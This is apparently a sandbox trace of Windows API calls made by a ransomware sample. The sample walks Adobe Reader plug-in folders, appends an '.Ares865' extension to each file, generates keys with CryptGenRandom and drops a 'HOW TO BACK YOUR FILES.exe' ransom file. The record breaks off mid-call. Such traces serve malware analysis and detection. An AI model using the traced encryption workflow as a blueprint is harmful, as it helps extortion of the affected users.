[0169.997] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0169.998] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.999] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d" [0169.999] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d" [0169.999] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0169.999] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins3d\\how to back your files.exe"), bFailIfExists=1) returned 0 [0170.000] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0170.001] GetLastError () returned 0x0 [0170.002] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0170.002] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7dbbfec0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54862d80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54862d80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0170.002] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0170.002] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0170.002] lstrcpyW (in: lpString1=0x2cce476, lpString2="2d.x3d" | out: lpString1="2d.x3d") returned="2d.x3d" [0170.003] lstrlenW (lpString="2d.x3d") returned 6 [0170.003] lstrlenW (lpString="Ares865") returned 7 [0170.003] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\2d.x3d.Ares865") returned 73 [0170.003] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\2d.x3d" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins3d\\2d.x3d"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\2d.x3d.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins3d\\2d.x3d.ares865"), dwFlags=0x1) returned 1 [0170.005] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\2d.x3d.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins3d\\2d.x3d.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0170.006] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=551304) returned 1 [0170.006] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0170.007] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0170.007] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0170.040] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0170.041] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0170.041] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0170.049] lstrcpyW (in: lpString1=0x2cce476, lpString2="3difr.x3d" | out: lpString1="3difr.x3d") returned="3difr.x3d" [0170.049] lstrlenW (lpString="3difr.x3d") returned 9 [0170.049] lstrlenW (lpString="Ares865") returned 7 [0170.049] lstrcmpiW (lpString1="ifr.x3d", lpString2="Ares865") returned 1 [0170.049] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\3difr.x3d.Ares865") returned 76 [0170.049] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\3difr.x3d" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins3d\\3difr.x3d"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\3difr.x3d.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins3d\\3difr.x3d.ares865"), dwFlags=0x1) returned 1 [0170.053] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\3difr.x3d.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins3d\\3difr.x3d.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0170.053] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=269200) returned 1 [0170.053] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0170.054] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0170.054] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0170.069] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0170.070] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0170.070] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0170.074] lstrcpyW (in: lpString1=0x2cce476, lpString2="drvDX8.x3d" | out: lpString1="drvDX8.x3d") returned="drvDX8.x3d" [0170.074] lstrlenW (lpString="drvDX8.x3d") returned 10 [0170.074] lstrlenW (lpString="Ares865") returned 7 [0170.074] lstrcmpiW (lpString1="DX8.x3d", lpString2="Ares865") returned 1 [0170.074] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\drvDX8.x3d.Ares865") returned 77 [0170.074] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\drvDX8.x3d" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins3d\\drvdx8.x3d"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\drvDX8.x3d.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins3d\\drvdx8.x3d.ares865"), dwFlags=0x1) returned 1 [0170.077] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\drvDX8.x3d.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins3d\\drvdx8.x3d.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0170.077] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=435600) returned 1 [0170.077] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0170.078] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0170.078] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0170.104] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0170.105] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0170.105] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0170.111] lstrcpyW (in: lpString1=0x2cce476, lpString2="drvDX9.x3d" | out: lpString1="drvDX9.x3d") returned="drvDX9.x3d" [0170.111] lstrlenW (lpString="drvDX9.x3d") returned 10 [0170.111] lstrlenW (lpString="Ares865") returned 7 [0170.111] lstrcmpiW (lpString1="DX9.x3d", lpString2="Ares865") returned 1 [0170.111] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\drvDX9.x3d.Ares865") returned 77 [0170.111] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\drvDX9.x3d" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins3d\\drvdx9.x3d"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\drvDX9.x3d.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins3d\\drvdx9.x3d.ares865"), dwFlags=0x1) returned 1 [0170.115] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\drvDX9.x3d.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins3d\\drvdx9.x3d.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0170.115] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=814992) returned 1 [0170.115] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0170.116] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0170.116] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0170.160] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0170.161] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0170.161] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0170.172] lstrcpyW (in: lpString1=0x2cce476, lpString2="drvSOFT.x3d" | out: lpString1="drvSOFT.x3d") returned="drvSOFT.x3d" [0170.172] lstrlenW (lpString="drvSOFT.x3d") returned 11 [0170.172] lstrlenW (lpString="Ares865") returned 7 [0170.172] lstrcmpiW (lpString1="OFT.x3d", lpString2="Ares865") returned 1 [0170.172] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\drvSOFT.x3d.Ares865") returned 78 [0170.172] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\drvSOFT.x3d" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins3d\\drvsoft.x3d"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\drvSOFT.x3d.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins3d\\drvsoft.x3d.ares865"), dwFlags=0x1) returned 1 [0170.175] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\drvSOFT.x3d.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins3d\\drvsoft.x3d.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0170.175] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=217488) returned 1 [0170.176] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0170.176] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0170.176] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0170.188] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0170.189] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0170.189] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0170.192] lstrcpyW (in: lpString1=0x2cce476, lpString2="prc" | out: lpString1="prc") returned="prc" [0170.192] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e79c8 [0170.192] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x7e) returned 0x2f00d8 [0170.192] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e79d0 | out: ListHead=0x2e7710, ListEntry=0x2e79d0) returned 0x2e79b0 [0170.192] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7dc58440, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x301190, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="prcr.x3d", cAlternateFileName="")) returned 1 [0170.192] lstrcmpiW (lpString1="prcr.x3d", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0170.192] lstrcmpiW (lpString1="prcr.x3d", lpString2="aoldtz.exe") returned 1 [0170.192] lstrcpyW (in: lpString1=0x2cce476, lpString2="prcr.x3d" | out: lpString1="prcr.x3d") returned="prcr.x3d" [0170.192] lstrlenW (lpString="prcr.x3d") returned 8 [0170.193] lstrlenW (lpString="Ares865") returned 7 [0170.193] lstrcmpiW (lpString1="rcr.x3d", lpString2="Ares865") returned 1 [0170.193] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\prcr.x3d.Ares865") returned 75 [0170.193] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\prcr.x3d" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins3d\\prcr.x3d"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\prcr.x3d.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins3d\\prcr.x3d.ares865"), dwFlags=0x1) returned 1 [0170.195] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\prcr.x3d.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins3d\\prcr.x3d.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0170.196] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3150224) returned 1 [0170.196] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0170.197] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0170.197] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0170.388] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0170.388] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0170.388] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0170.407] lstrcpyW (in: lpString1=0x2cce476, lpString2="tesselate.x3d" | out: lpString1="tesselate.x3d") returned="tesselate.x3d" [0170.407] lstrlenW (lpString="tesselate.x3d") returned 13 [0170.407] lstrlenW (lpString="Ares865") returned 7 [0170.407] lstrcmpiW (lpString1="ate.x3d", lpString2="Ares865") returned 1 [0170.407] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\tesselate.x3d.Ares865") returned 80 [0170.407] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\tesselate.x3d" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins3d\\tesselate.x3d"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\tesselate.x3d.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins3d\\tesselate.x3d.ares865"), dwFlags=0x1) returned 1 [0170.411] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\tesselate.x3d.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins3d\\tesselate.x3d.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0170.411] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=22424) returned 1 [0170.411] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0170.412] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0170.412] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0170.415] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0170.416] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0170.416] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0170.417] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\prc", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\prc") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\prc" [0170.417] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\prc" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\prc") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\prc" [0170.417] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0170.417] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\prc\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins3d\\prc\\how to back your files.exe"), bFailIfExists=1) returned 0 [0170.418] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0170.419] GetLastError () returned 0x0 [0170.419] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0170.419] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\prc\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7dbbfec0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54862d80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54862d80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0170.420] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0170.420] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0170.420] lstrcpyW (in: lpString1=0x2cce47e, lpString2="MyriadCAD.otf" | out: lpString1="MyriadCAD.otf") returned="MyriadCAD.otf" [0170.420] lstrlenW (lpString="MyriadCAD.otf") returned 13 [0170.420] lstrlenW (lpString="Ares865") returned 7 [0170.420] lstrcmpiW (lpString1="CAD.otf", lpString2="Ares865") returned 1 [0170.420] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\prc\\MyriadCAD.otf.Ares865") returned 84 [0170.420] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\prc\\MyriadCAD.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins3d\\prc\\myriadcad.otf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\prc\\MyriadCAD.otf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins3d\\prc\\myriadcad.otf.ares865"), dwFlags=0x1) returned 1 [0170.423] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\prc\\MyriadCAD.otf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins3d\\prc\\myriadcad.otf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0170.424] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=78276) returned 1 [0170.424] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0170.425] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0170.425] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0170.430] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0170.431] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0170.431] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0170.433] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins" [0170.433] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins" [0170.433] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0170.433] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\how to back your files.exe"), bFailIfExists=1) returned 0 [0170.434] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0170.435] GetLastError () returned 0x0 [0170.435] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0170.435] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cfb2f60, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54888ee0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54888ee0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0170.435] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR 